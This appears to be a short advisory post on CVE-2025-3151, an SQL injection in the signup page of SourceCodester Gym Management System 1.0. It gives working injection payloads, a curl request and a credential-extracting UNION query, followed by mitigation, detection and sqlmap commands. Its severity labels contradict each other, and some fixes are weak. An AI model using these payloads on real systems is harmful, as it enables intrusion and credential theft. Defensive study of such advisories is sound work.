SourceCodester Gym Management System 10, SQL Injection, CVE-2025-3151 (Critical)

Listen to this Post

How the CVE Works:

CVE-2025-3151 is a critical SQL injection vulnerability in SourceCodester Gym Management System 1.0, specifically in the `/signup.php` file. The flaw arises due to improper sanitization of the `user_name` parameter, allowing attackers to inject malicious SQL queries. When a crafted payload is submitted, the backend database executes unintended commands, potentially leading to unauthorized data access, manipulation, or system compromise. The attack is remotely exploitable, requiring no authentication, and has a CVSS 4.0 score of 6.9 (MEDIUM). Publicly disclosed exploits increase the risk of widespread abuse.

DailyCVE Form:

Platform: SourceCodester Gym
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/14/2025

What Undercode Say:

Exploitation:

1. Craft Payload:

' OR '1'='1' --

2. Send Request:

curl -X POST -d "user_name=admin' OR '1'='1' --&password=test" http://target/signup.php

3. Extract Data:

' UNION SELECT 1,2,3,4,CONCAT(username,':',password) FROM users --

Mitigation:

1. Input Sanitization:

$user_name = mysqli_real_escape_string($conn, $_POST['user_name']);

2. Prepared Statements:

$stmt = $conn->prepare("INSERT INTO users (user_name) VALUES (?)");
$stmt->bind_param("s", $user_name);

3. WAF Rules:

location /signup.php {
deny all;
}

Detection:

1. Log Analysis:

grep "POST /signup.php" /var/log/apache2/access.log | grep -E "'|--|\""

2. SQLi Scanner:

sqlmap -u "http://target/signup.php" --data="user_name=test&password=test" --risk=3

Patch:

  • Upgrade to patched version (if available).
  • Disable `/signup.php` if unused.

Impact:

  • Data theft (credentials, PII).
  • Unauthorized admin access.
  • Database corruption.

References:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top